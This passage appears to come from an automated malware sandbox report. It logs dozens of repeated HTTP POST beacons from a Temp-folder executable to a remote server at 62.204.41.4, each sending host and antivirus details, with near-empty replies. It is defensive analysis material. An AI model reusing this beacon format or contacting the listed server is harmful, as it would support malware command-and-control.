                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      773192.168.2.75046862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:27.766830921 CET888OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:27.829786062 CET888INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      774192.168.2.75046962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:28.062597036 CET889OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:28.126764059 CET889INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      775192.168.2.75047062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:28.297772884 CET890OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:28.361551046 CET890INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      776192.168.2.75047162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:28.534173965 CET891OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:28.599333048 CET891INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      777192.168.2.75047262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:28.781018019 CET892OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:28.845155001 CET892INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      778192.168.2.75047362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:29.015985966 CET893OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:29.081521988 CET893INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      779192.168.2.75047462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:29.268969059 CET894OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:29.332952976 CET894INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      78192.168.2.74977362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:22.191272974 CET193OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:22.257436037 CET193INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      780192.168.2.75047562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:29.511990070 CET895OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:29.575716972 CET895INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      781192.168.2.75047662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:29.753559113 CET896OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:29.817495108 CET896INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      782192.168.2.75047762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:29.999027967 CET897OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:30.062169075 CET897INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      783192.168.2.75047862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:30.234168053 CET898OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:30.297786951 CET898INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      79192.168.2.74977462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:22.447557926 CET194OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:22.509736061 CET194INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.74970262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:03.497684956 CET112OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:03.560082912 CET112INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      80192.168.2.74977562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:22.751530886 CET195OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:22.830991030 CET195INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      81192.168.2.74977662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:23.001075029 CET196OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:23.067475080 CET196INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      82192.168.2.74977762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:23.237313032 CET197OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:23.300386906 CET197INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      83192.168.2.74977862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:23.476929903 CET198OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:23.538858891 CET198INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      84192.168.2.74977962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:23.701654911 CET199OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:23.763823032 CET199INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      85192.168.2.74978062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:23.953445911 CET200OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
